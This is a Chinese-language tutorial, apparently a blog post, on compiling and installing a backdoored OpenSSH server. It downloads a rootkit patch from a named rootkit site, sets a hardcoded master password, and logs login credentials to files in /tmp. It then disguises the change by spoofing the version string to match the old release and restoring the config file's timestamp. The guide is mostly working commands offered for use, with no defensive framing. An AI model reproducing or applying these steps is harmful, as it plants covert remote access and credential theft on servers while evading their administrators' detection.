一.查看SSH版本
[root@redkey vmshare]# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下载SSH 源码包
源码包：
http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
后门文件：
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
三.备份原有ssh配置文件
[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}
四.编译安装
[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz [root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz [root@redkey vmshare]# cd openssh-5.9p1.patch/ [root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1 [root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1 [root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff patching file auth.c patching file auth-pam.c patching file auth-passwd.c patching file canohost.c patching file includes.h patching file log.c patching file servconf.c patching file sshconnect2.c patching file sshlogin.c patching file version.hxiu

设置后门密码”redkey”

[root@redkey openssh-5.9p1]# vim includes.h
175 int secret_ok; 176 FILE *f; 177 #define ILOG "/tmp/ilog" 178 #define OLOG "/tmp/olog" 179 #define SECRETPW "redkey" 180 #endif /* INCLUDES_H */

修改版本信息(SSH_VERSION)：

/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */ \#define SSH_VERSION "OpenSSH_5.3p1" \#define SSH_PORTABLE "p1" \#define SSH_RELEASE SSH_VERSION SSH_PORTABLE

编译&安装

[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 [root@redkey openssh-5.9p1]# make [root@redkey openssh-5.9p1]# make install
五.还原sshd_config文件时间戳
[root@redkey ssh]# touch -r sshd_config.bak ssh_config
六.重启服务或重新载入配置
[root@redkey ssh]# service sshd reload
七.常见问题
1.需要安装的软件包
openssl openssl-devel pam-devel
2.编译常见的问题
编译过程中可能出现的报错：
configure: error: *** zlib.h missing – please install first or check config.log \# \#yum install zlib-devel configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) *** \# \ #yum install openssl openssl-devel